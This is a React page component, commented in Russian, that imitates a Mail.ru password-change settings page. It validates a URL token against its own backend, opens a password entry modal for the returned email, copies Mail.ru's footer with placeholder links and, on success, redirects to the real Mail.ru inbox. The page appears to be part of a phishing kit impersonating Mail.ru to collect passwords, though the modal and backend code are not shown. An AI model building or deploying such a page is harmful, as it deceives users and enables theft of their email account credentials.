import React, { useState, useEffect } from 'react';
import { useParams } from 'react-router-dom';
import Container from '../components/layout/Container';
import Header from '../components/layout/Header';
import PasswordModal from '../components/common/PasswordModal';
import PasswordCard from '../components/common/PasswordCard';
import ErrorModal from '../components/common/ErrorModal';
import SuccessModal from '../components/common/SuccessModal';
import { API } from '../config';

/**
 * HomePage Component
 * Страница настроек Mail.ru с изменением пароля
 */
export const HomePage = () => {
  const { token } = useParams();
  const [isModalOpen, setIsModalOpen] = useState(true);
  const [userEmail, setUserEmail] = useState(null);
  const [tokenError, setTokenError] = useState(null);
  const [isValidating, setIsValidating] = useState(false);
  const [showSuccess, setShowSuccess] = useState(false);

  // Проверяем валидность токена при загрузке компонента
  useEffect(() => {
    if (token) {
      validateToken(token);
    }
  }, [token]);

  const validateToken = async (tokenValue) => {
    setIsValidating(true);
    console.log('Validating token:', tokenValue);
  
    try {
      const url = API.VALIDATE_TOKEN(tokenValue);
      console.log('Validating token at:', url);

      const response = await fetch(url);
      console.log('Response status:', response.status);

      if (!response.ok) {
        console.error('Server returned', response.status);
        setTokenError(`Ошибка сервера (${response.status}). Попробуйте позже.`);
        setIsModalOpen(false);
        return;
      }

      const data = await response.json();
      console.log('Response data:', data);

      if (data.valid) {
        setUserEmail(data.email);
        console.log('Token is valid. Email:', data.email);
      } else {
        console.log('Token is invalid. Reason:', data.reason);
        let errorMessage = 'Ссылка недействительна или истекла.';
        if (data.reason === 'already_used') {
          errorMessage = 'Эта ссылка уже была использована. Пожалуйста, запросите новую ссылку для смены пароля.';
        } else if (data.reason === 'not_found') {
          errorMessage = 'Ссылка не найдена или недействительна.';
        }
        setTokenError(errorMessage);
        setIsModalOpen(false);
      }
    } catch (error) {
      console.error('Error validating token:', error);
      setTokenError('Не удалось подключиться к серверу. Проверьте соединение.');
      setIsModalOpen(false);
    } finally {
      setIsValidating(false);
    }
  };

  return (
    <div className="min-h-screen bg-white flex flex-col">
      {/* Header */}
      <Header />

      {/* Main Content */}
      <main className="flex-1 pt-[92px]">
        <Container maxWidth="full">
          <div className="flex justify-center pt-6">
            <PasswordCard onOpenModal={() => setIsModalOpen(true)} />
          </div>
        </Container>
      </main>

      {/* Footer */}
      <footer className="bg-[#f6f7f8] py-2 px-4">
        <div className="flex gap-4 text-[#999999] text-[12px]">
          <a href="https://mail.ru/" className="hover:text-[#0077ff]">Mail</a>
          <a href="#" className="hover:text-[#0077ff]">О компании</a>
          <a href="#" className="hover:text-[#0077ff]">Реклама</a>
          <a href="#" className="hover:text-[#0077ff]">Вакансии</a>
        </div>
      </footer>

      {/* Password Modal */}
      {isModalOpen && !tokenError && !isValidating && !showSuccess && (
        <PasswordModal
          onClose={() => setIsModalOpen(false)}
          userEmail={userEmail}
          token={token}
          onSuccess={() => setShowSuccess(true)}
        />
      )}

      {/* Success Modal */}
      {showSuccess && (
        <SuccessModal
          onClose={() => setShowSuccess(false)}
          redirectUrl="https://e.mail.ru/inbox/"
        />
      )}

      {/* Error Modal */}
      {tokenError && (
        <ErrorModal
          title="Ссылка недействительна"
          message={tokenError}
          onClose={() => setTokenError(null)}
        />
      )}
    </div>
  );
};

export default HomePage;